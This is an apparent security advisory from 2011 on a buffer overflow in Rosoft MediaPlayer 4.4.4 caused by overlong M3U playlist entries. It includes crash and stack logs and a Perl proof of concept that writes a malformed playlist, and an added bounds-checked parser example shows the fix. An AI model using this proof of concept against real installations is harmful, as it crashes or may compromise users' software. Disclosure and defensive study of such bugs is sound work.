Document Title:
===============
Rosoft MediaPlayer v4.4.4 - Buffer Overflow Vulnerability

Release Date:
=============
2011-06-21

Vulnerability Laboratory ID (VL-ID):
====================================
94

Product & Service Introduction:
===============================
Ever since we released our very first multimedia program in 1999 we have kept on improving the programs to fit our users' needs. Over the years we have come up with four programs that do pretty much what you need when it comes to the ordinary audio demands. We have four programs: Rosoft Audio Converter, Rosoft Audio Recorder, Rosoft CD Extractor and Rosoft Media Player. Our programs target non-advanced users, although an advanced user may well find our tools useful. Our goal has been to create tools that are easy to use. Below you have a list of some of all the download sites where you can find our programs.

(Copy of the Vendor Homepage: http://www.rosoftengineering.com/Default.aspx)

Abstract Advisory Information:
==============================
The Vulnerability-Lab Team discovered a buffer overflow vulnerability in Rosoft MediaPlayer Free - Silver Edition.

Vulnerability Disclosure Timeline:
==================================
2011-06-21: Public or Non-Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A buffer overflow vulnerability was detected in Rosoft MediaPlayer v4.4.4. Because the length of a playlist entry is not validated while the file is loaded, an overlong entry overflows a buffer and crashes the program. The bug can very likely be used to push the overflow further and take control of the process under the privileged user account running the service. The exception log below shows the fault in ntdll!RtlUnicodeToMultiByteN while it writes the byte 0x41 ('A') to 0x00130000, and the stack frames that follow are overwritten with 0x41414141.

--- Exception Logs ---
(3f8.310): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001a27d2 ebx=00000041 ecx=0012fff5 edx=0000ad30 esi=7ffb0222 edi=00000010
eip=7c91302c esp=0012e4f8 ebp=0012e504 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlUnicodeToMultiByteN+0x91:
7c91302c 88590b          mov     byte ptr [ecx+0Bh],bl      ds:0023:00130000=41

--- Stacktext Logs ---
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e504 77d202a5 0012e9cc 000186b0 0012e544 ntdll!RtlUnicodeToMultiByteN+0x91
0012e52c 77d46c30 00000000 0019fb80 0000c358 USER32!WCSToMBEx+0x7e
0012e554 77d2f7c0 00160970 00000000 00000001 USER32!GetClipboardFormatNameA+0x68eb
0012e5e0 77d36175 00720298 00000189 00000000 USER32!WINNLSGetIMEHotkey+0x2681
0012e600 77d18709 000502b6 00000189 00000000 USER32!SetDlgItemTextA+0xa0
0012e62c 77d187eb 77d36129 000502b6 00000189 USER32!GetDC+0x72
0012e694 77d1c00e 00000000 77d36129 000502b6 USER32!GetDC+0x154
0012e6c4 77d1e366 77d36129 000502b6 00000189 USER32!DestroyCaret+0x5e
0012e6e4 0043dc93 77d36129 000502b6 00000189 USER32!CallWindowProcA+0x1b
0012e850 0042818b 0012e910 00a00f53 00aad1ec image00400000+0x3dc93
0012e890 0042b5e2 00000189 00000000 0012e9cc image00400000+0x2818b
0012e8a8 77d18709 000502b6 00000189 00000000 image00400000+0x2b5e2
0012e8d4 77d187eb 00a00f53 000502b6 00000189 USER32!GetDC+0x72
0012e93c 77d1b743 00000000 00a00f53 000502b6 USER32!GetDC+0x154
0012e978 77d1e2f7 00720298 00720230 00000000 USER32!GetParent+0x16c
0012e998 00427498 000502b6 00000189 00000000 USER32!SendMessageA+0x49
0012f9d0 41414141 41414141 41414141 41414141 image00400000+0x27498
0012f9d4 41414141 41414141 41414141 41414141 0x41414141
0012f9d8 41414141 41414141 41414141 41414141 0x41414141
0012f9dc 41414141 41414141 41414141 41414141 0x41414141
0012f9e0 41414141 41414141 41414141 41414141 0x41414141
0012f9e4 41414141 41414141 41414141 41414141 0x41414141
0012f9e8 41414141 41414141 41414141 41414141 0x41414141
0012f9ec 41414141 41414141 41414141 41414141 0x41414141
0012f9f0 41414141 41414141 41414141 41414141 0x41414141
0012f9f4 41414141 41414141 41414141 41414141 0x41414141
0012f9f8 41414141 41414141 41414141 41414141 0x41414141
0012f9fc 41414141 41414141 41414141 41414141 0x41414141
0012fa00 41414141 41414141 41414141 41414141 0x41414141
0012fa04 41414141 41414141 41414141 41414141 0x41414141
0012fa08 41414141 41414141 41414141 41414141 0x41414141
0012fa0c 41414141 41414141 41414141 41414141 0x41414141
0012fa10 41414141 41414141 41414141 41414141 0x41414141
0012fa14 41414141 41414141 41414141 41414141 0x41414141
0012fa18 41414141 41414141 41414141 41414141 0x41414141
0012fa1c 41414141 41414141 41414141 41414141 0x41414141
0012fa20 41414141 41414141 41414141 41414141 0x41414141
0012fa24 41414141 41414141 41414141 41414141 0x41414141
0012fa28 41414141 41414141 41414141 41414141 0x41414141
0012fa2c 41414141 41414141 41414141 41414141 0x41414141
...

Pictures: ../1.png

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers via stream or by local attackers to escalate out of the software process. For demonstration or reproduction, the following Perl script writes the malformed playlist file ...

#!/usr/bin/perl
use strict;
use warnings;

my $sploitfile = "vlab.m3u";
print " [+] Preparing payload\n";
my $header  = "http://";
my $junk    = "A" x 50000;       # overlong entry that overflows the player's buffer
my $payload = $header . $junk;
print " [+] Writing payload to file\n";
open(my $fh, '>', $sploitfile) or die "Cannot open $sploitfile: $!";
print $fh $payload;
close($fh);
print " [+] PoC file $sploitfile created\n";
print " [+] Wrote " . length($payload) . " bytes\n";

Security Risk:
==============
The security risk of the buffer overflow vulnerability via m3u files is estimated as high.

Credits & Authors:
==================
Vulnerability Research Laboratory - X4lt

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory
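The Technical Details and PoC sections above describe a playlist entry copied without a length check. As an added example (not Rosoft's code and not part of the advisory), the following bounds-checked M3U reader shows the validation that would have prevented the crash: MAX_ENTRY is an assumed limit, media.example is a constructed host, and demo_poc_shape() builds a constructed playlist with the same "http://" + 50000 'A's shape as the advisory's PoC file.

```c
#include <string.h>

/* Assumed entry limit; the advisory's PoC line is "http://" + 50000 'A's. */
#define MAX_ENTRY 1024

struct m3u_stats { int accepted; int rejected; };
/* Copy one line into dst only if it fits with its NUL; else leave dst alone. */
static int copy_entry_checked(char *dst, size_t dstsz, const char *line, size_t len)
{
    if (len >= dstsz) return 0;
    memcpy(dst, line, len);
    dst[len] = '\0';
    return 1;
}

/* Walk an in-memory playlist: '#' directives and blank lines are skipped,
 * every other line is a media location that must pass the length check. */
struct m3u_stats parse_m3u(const char *data)
{
    struct m3u_stats st = {0, 0};
    char entry[MAX_ENTRY];
    const char *p = data;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len && p[len - 1] == '\r') len--;   /* tolerate CRLF playlists */
        if (len && p[0] != '#') {
            if (copy_entry_checked(entry, sizeof entry, p, len)) st.accepted++;
            else st.rejected++;
        }
        if (!nl) break;
        p = nl + 1;
    }
    return st;
}

/* Constructed sample shaped like the PoC: one ordinary entry, then
 * "http://" followed by 50000 'A's, which the checked parser rejects. */
struct m3u_stats demo_poc_shape(void)
{
    static char buf[50200];
    const char *head = "#EXTM3U\nhttp://media.example/song.mp3\nhttp://";
    size_t n = strlen(head);
    memcpy(buf, head, n);
    memset(buf + n, 'A', 50000);
    n += 50000;
    buf[n++] = '\n'; buf[n] = '\0';
    return parse_m3u(buf);
}
```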